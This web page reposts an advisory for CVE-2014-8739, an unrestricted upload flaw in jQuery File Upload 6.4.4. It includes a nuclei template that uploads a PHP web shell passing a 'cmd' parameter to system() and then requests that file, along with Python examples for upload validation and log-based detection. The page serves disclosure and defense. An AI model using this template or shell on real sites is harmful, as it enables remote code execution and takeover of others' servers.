jQuery File Upload 6.4.4 - Unrestricted File Upload

Vulnerability Information

Vulnerability name: jQuery File Upload 6.4.4 - Unrestricted File Upload

Vulnerability ID:

  • CVE: CVE-2014-8739

Vulnerability type: File upload

Severity: Critical

Description: jQuery File Upload is a widely used file upload plugin that supports several upload methods and is commonly used to implement the file upload feature of a website; its ease of use and flexibility have led many sites to adopt it. Version 6.4.4 of the plugin contains a file upload vulnerability: because server/php/UploadHandler.php does not validate the type of uploaded files, an attacker can upload arbitrary files, including PHP files, which leads to remote code execution. The root cause is the failure to properly validate the type and extension of uploaded files, which lets an attacker bypass the intended security restrictions. An attacker who successfully exploits this vulnerability can upload a malicious PHP file and execute arbitrary code on the server, which may result in complete takeover of the website, leakage of server data, and even use of the server as a pivot for attacking other systems. Exploitation requires no authentication and can be automated, so the risk is extremely high.
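The remediation the template lists (server-side type validation, an allow-list of extensions, a restricted upload directory with tight permissions) as one worked check. This is an added illustration in Python, not code from the jQuery File Upload project or its server/php/UploadHandler.php; the allow-list, the magic-byte table, the hypothetical validate_upload and save_upload functions and the storage layout are assumptions of this example.

```python
"""Server-side upload validation, as an added illustration (not project code).

The vulnerable server/php/UploadHandler.php accepted any file name, so a
multipart part named "x.php" was stored under the web root as x.php and
could then be requested and executed. The checks below are one generic way
to refuse that; the allow-list, magic-byte table and storage layout are
assumptions chosen for this example.
"""
import os
import secrets
from dataclasses import dataclass

# Allow-list of permitted extensions, each paired with the leading bytes a
# genuine file of that type starts with (assumed table for this example).
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

# Extensions a web server may hand to an interpreter. They are refused
# anywhere in the name, not only at the end, because some server
# configurations evaluate every extension of a name like "shell.php.png".
EXECUTABLE_EXTENSIONS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar",
    "cgi", "pl", "py", "sh", "jsp", "asp", "aspx",
}


@dataclass
class Verdict:
    accepted: bool
    reason: str
    stored_name: str = ""   # random server-side name, set only when accepted


def validate_upload(client_name: str, content: bytes) -> Verdict:
    """Apply the allow-list and content checks to one uploaded part."""
    # 1. The client-supplied name must be a bare file name: no directories.
    base = os.path.basename(client_name.replace("\\", "/"))
    if base in ("", ".", "..") or base != client_name:
        return Verdict(False, "path components are not allowed in file names")

    # 2. A name needs a non-empty stem and an extension; this also refuses
    #    dot-files such as ".htaccess", which must never land in upload dirs.
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return Verdict(False, "missing extension")
    ext = parts[-1]

    # 3. Refuse any executable extension anywhere in the name.
    if set(parts[1:]) & EXECUTABLE_EXTENSIONS:
        return Verdict(False, f"executable extension in name: {base}")

    # 4. The final extension must be on the allow-list (not merely absent
    #    from a deny-list).
    if ext not in ALLOWED_TYPES:
        return Verdict(False, f"extension not in allow-list: .{ext}")

    # 5. The content must look like the claimed type; the client's
    #    Content-Type header is not consulted at all.
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return Verdict(False, f"content does not match .{ext}")

    # 6. Never reuse the client's name: a random one makes the stored URL
    #    unguessable, which is what step 3 of the PoC relies on.
    return Verdict(True, "ok", f"{secrets.token_hex(16)}.{ext}")


def save_upload(verdict: Verdict, content: bytes, upload_root: str) -> str:
    """Write an accepted file outside the web root, non-executable, no overwrite."""
    if not verdict.accepted:
        raise ValueError(verdict.reason)
    os.makedirs(upload_root, mode=0o750, exist_ok=True)
    dest = os.path.join(upload_root, verdict.stored_name)
    # O_EXCL refuses to clobber an existing file; 0o640 sets no execute bit.
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    return dest


if __name__ == "__main__":
    # Constructed sample inputs: a PoC-style name plus genuine-looking headers.
    png = b"\x89PNG\r\n\x1a\n" + bytes(8)
    for name, data in [
        ("abcd1234.php", b"<?php echo 'x'; ?>"),
        ("shell.php.png", png),
        ("../photo.png", png),
        ("photo.png", b"<?php echo 'x'; ?>"),
        ("photo.png", png),
    ]:
        v = validate_upload(name, data)
        print(f"{name:16} accepted={v.accepted!s:5} {v.reason} {v.stored_name}")
```

The order of the checks matters less than the fact that every one of them is an allow-list decision: the client's name is only used to derive an extension, the extension must be known, the bytes must match it, and what is written to disk is a name the client never chose, in a directory the web server does not execute from.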

Vendor: jquery_file_upload_project

Product: jQuery File Upload

Affected versions: 6.4.4

Source: https://github.com/projectdiscovery/nuclei-templates/blob/96aadf6e6be15f346a83713bd1cf0ba7e9cbf329/http%2Fcves%2F2014%2FCVE-2014-8739.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC Details


id: CVE-2014-8739

info:
  name: jQuery File Upload 6.4.4 - Unrestricted File Upload
  author: pranjal
  severity: critical
  description: jQuery File Upload Plugin 6.4.4 contains an unrestricted file upload caused by lack of validation in server/php/UploadHandler.php, letting remote attackers execute arbitrary PHP code by uploading PHP files, exploit requires uploading a PHP file with a PHP extension and accessing it directly.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution by uploading malicious PHP files, potentially compromising the entire web application and server.
  remediation: |
    - Upgrade to a patched version of jQuery File Upload plugin
    - Implement proper file type validation on the server side
    - Restrict upload directories and file permissions
    - Use whitelist approach for allowed file extensions
  reference:
    - https://www.exploit-db.com/exploits/35057/
    - https://www.exploit-db.com/exploits/36811/
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-8739
    cwe-id: CWE-434
    epss-score: 0.94326
    epss-percentile: 0.99943
    cpe: cpe:2.3:a:jquery_file_upload_project:jquery_file_upload:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: jquery_file_upload_project
    product: jquery_file_upload
    verified: true
  tags: cve2014,cve,edb,jquery,file-upload,rce,kev

variables:
  randstr: "{{randstr}}"
  php_payload: |
    <?php
    echo "{{randstr}}";
    if(isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
    ?>

http:
  # Step 1: Check if the vulnerable endpoint exists
  - method: GET
    path:
      - "{{BaseURL}}/server/php/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '^{\"files\":'
          - '"files":\s*\[\]'
        part: body
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: upload_url
        part: body
        regex:
          - '"url":\s*"([^"]+)"'
          - '"upload_url":\s*"([^"]+)"'

  # Step 2: Attempt to upload a PHP file
  - method: POST
    path:
      - "{{BaseURL}}/server/php/"

    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

    body: |
      ------WebKitFormBoundary{{randstr}}
      Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
      Content-Type: application/x-php

      {{php_payload}}
      ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"files":\s*\[[^\]]*"[^"]*{{randstr}}[^"]*"'
          - '"name":\s*"{{randstr}}\.php"'
          - '"error":\s*"File upload aborted"'
        part: body
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: uploaded_file
        part: body
        regex:
          - '"name":\s*"([^"]+)"'
          - '"url":\s*"([^"]+)"'

  # Step 3: Verify the uploaded file is accessible
  - method: GET
    path:
      - "{{BaseURL}}/server/php/files/{{randstr}}.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_output
        part: body
        regex:
          - '{{randstr}}'

# digest: 4a0a00473045022030d53b9152e1513c3423d7cdcb1b4d794cd54be61b903513a98849ef85a7a169022100bfb0a8e2682ffeb9d07fabd8b1a238debd4d25a1790fe0b672c7289916f12b56:922c64590222798bb761d5b6d8e72950
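The three requests the template issues (a GET probe of /server/php/, a POST of a .php part to the same endpoint, then a GET of /server/php/files/<name>.php) leave a recognisable trace in a web server's access log. The following detection logic runs over a few constructed combined-format log lines; it is an added Python example, not part of the nuclei template or of this page, and the log format, the ten-minute correlation window, the path prefixes and the alert wording are assumptions made for the example.

```python
"""Access-log detection for the upload-then-request pattern of this PoC.

Added example, not part of the nuclei template or the page. It assumes
Apache/nginx "combined" access-log lines; the correlation window, the
path prefixes and the alert wording are choices made for this example.
"""
import re
from datetime import datetime
from urllib.parse import urlsplit

# Combined log format: ip ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD_ENDPOINT = "/server/php"          # step 1 probe and step 2 POST
UPLOAD_DIR = "/server/php/files/"        # where step 3 fetches the file
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

# Constructed sample: one PoC-like sequence, one benign image fetch and one
# lone request for a script name that is not present on the server.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Jul/2025:10:00:01 +0000] "GET /server/php/ HTTP/1.1" 200 12 "-" "scanner"',
    '203.0.113.5 - - [28/Jul/2025:10:00:02 +0000] "POST /server/php/ HTTP/1.1" 200 98 "-" "scanner"',
    '203.0.113.5 - - [28/Jul/2025:10:00:03 +0000] "GET /server/php/files/abcd1234.php HTTP/1.1" 200 8 "-" "scanner"',
    '198.51.100.7 - - [28/Jul/2025:10:05:00 +0000] "GET /server/php/files/holiday.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [28/Jul/2025:11:30:00 +0000] "GET /server/php/files/old.php HTTP/1.1" 404 0 "-" "curl/8.0"',
]


def parse_line(line: str):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    return {
        "ip": rec["ip"],
        "ts": datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": rec["method"],
        "path": urlsplit(rec["target"]).path,
        "status": int(rec["status"]),
    }


def detect(lines, window_seconds: int = 600):
    """Return one alert per request for an executable name under the upload dir.

    The alert is upgraded when the same client POSTed to the upload endpoint
    within `window_seconds` beforehand, i.e. the PoC's step 2 -> step 3
    sequence. A 200 on such a request mirrors the template's success matcher;
    a 404 still shows someone testing for the weakness.
    """
    alerts = []
    last_post = {}   # client ip -> time of its last POST to the upload endpoint
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if rec["method"] == "POST" and path.rstrip("/") == UPLOAD_ENDPOINT:
            last_post[ip] = rec["ts"]
            continue
        if path.startswith(UPLOAD_DIR) and EXEC_EXT.search(path):
            kind = "executable file requested from upload directory"
            prev = last_post.get(ip)
            if prev is not None and 0 <= (rec["ts"] - prev).total_seconds() <= window_seconds:
                kind = "upload to endpoint followed by request for uploaded script"
            alerts.append({"ip": ip, "time": rec["ts"].isoformat(), "path": path,
                           "status": rec["status"], "kind": kind})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f'{a["time"]} {a["ip"]:14} {a["status"]} {a["path"]}  <- {a["kind"]}')
```

Against the sample the third line produces the correlated alert and the last line a stand-alone one; the image fetch and the initial GET probe produce nothing. On a real server the request for any script-like name under the upload directory is itself the actionable signal, since a correctly configured upload directory should never serve such a name with a 200.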


http://example.com/2025/07/28/github_321537037/
Author
lianccc
Published on
July 28, 2025